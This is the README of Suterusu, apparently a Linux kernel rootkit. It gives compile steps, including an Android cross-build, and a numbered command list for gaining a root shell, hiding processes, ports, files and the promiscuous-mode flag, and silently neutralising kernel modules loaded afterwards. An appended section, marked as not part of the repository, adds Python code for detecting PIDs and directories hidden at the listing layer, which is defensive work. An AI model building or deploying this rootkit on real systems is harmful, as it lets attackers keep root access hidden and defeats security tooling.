Michael Coppola, commit b03af69015: Merge pull request #10 from lawrencehoffman/master (6 years ago)
README.md

Suterusu

Typical compilation steps:

$ wget http://kernel.org/linux-x.x.x.tar.gz
$ tar xvf linux-x.x.x.tar.gz
$ cd linux-x.x.x
$ make menuconfig
$ make modules_prepare
$ cd /path/to/suterusu
$ make linux-x86 KDIR=/path/to/kernel

To compile against the currently running kernel (kernel headers installed):

$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build

If a specific toolchain is desired for cross-compilation, provide the CROSS_COMPILE variable during make:

$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel

To compile the command binary:

$ gcc sock.c -o sock

Commands

Root shell

$ ./sock 0

Hide PID

$ ./sock 1 [pid]

Unhide PID

$ ./sock 2 [pid]

Hide TCPv4 port

$ ./sock 3 [port]

Unhide TCPv4 port

$ ./sock 4 [port]

Hide TCPv6 port

$ ./sock 5 [port]

Unhide TCPv6 port

$ ./sock 6 [port]

Hide UDPv4 port

$ ./sock 7 [port]

Unhide UDPv4 port

$ ./sock 8 [port]

Hide UDPv6 port

$ ./sock 9 [port]

Unhide UDPv6 port

$ ./sock 10 [port]

Hide file/directory

$ ./sock 11 [name]

Unhide file/directory

$ ./sock 12 [name]

Hide network PROMISC flag

$ ./sock 13

Unhide network PROMISC flag

$ ./sock 14

Enable module loading (force kernel.modules_disabled=0)

$ ./sock 15

Silently prohibit module loading (neutralize future loaded modules)

$ ./sock 16

Silently re-permit module loading (undo command 16)

$ ./sock 17

File/directory hiding

At the moment, file/dir hiding only hides names on the root (/) filesystem. Names are hidden, not paths: giving the name ".blah" to Suterusu hides every entry named ".blah" in every directory on that filesystem.
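Two host-side checks a defender can run against the PID-hiding commands (1/2) and the name-based file hiding described above, written as an added example that is not part of the Suterusu repository. It assumes, as the description implies, that hiding works by filtering directory listings (readdir) while the hidden /proc/<pid> or file remains reachable by path; the function names hidden_pids, is_process, scan_proc and missing_subdirs are this example's own.

```python
import os
import stat

def hidden_pids(listed, probe, pid_max):
    """PIDs that pass probe(pid) but are absent from `listed` (the PIDs a
    readdir of /proc returned). A hook that only filters directory entries
    leaves /proc/<pid> reachable by path, so the difference is what is hidden."""
    return sorted(p for p in range(1, pid_max + 1) if p not in listed and probe(p))

def is_process(proc, pid):
    """True if /proc/<pid> exists and is a thread-group leader. Threads are
    reachable as /proc/<tid> yet never listed, so without the Tgid check
    every thread would be reported as a hidden PID."""
    try:
        with open(os.path.join(proc, str(pid), "status")) as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return False
    return False

def scan_proc(proc="/proc", pid_max=None):
    """Run hidden_pids() against the live /proc (Linux only)."""
    listed = {int(n) for n in os.listdir(proc) if n.isdigit()}
    if pid_max is None:
        with open(os.path.join(proc, "sys/kernel/pid_max")) as f:
            pid_max = int(f.read())
    return hidden_pids(listed, lambda p: is_process(proc, p), pid_max)

def missing_subdirs(path):
    """Subdirectories a listing of `path` fails to show, judged by link count:
    ext4, xfs and tmpfs keep a directory's st_nlink at 2 + subdirectory count.
    Returns None where the filesystem does not keep the count (btrfs reports 1)."""
    nlink = os.stat(path).st_nlink
    if nlink < 2:
        return None
    seen = 0
    for name in os.listdir(path):
        try:
            if stat.S_ISDIR(os.lstat(os.path.join(path, name)).st_mode):
                seen += 1
        except OSError:  # entry vanished between listing and lstat
            pass
    return nlink - 2 - seen

if __name__ == "__main__":
    print("PIDs reachable by path but absent from /proc listing:", scan_proc())
    print("subdirectory names of / not shown by readdir:", missing_subdirs("/"))
```

Both checks only catch hiding done at the directory-listing layer; a hook that also filters path lookups, or a filesystem that does not maintain directory link counts, leaves them blind, so treat a clean result as absence of evidence only.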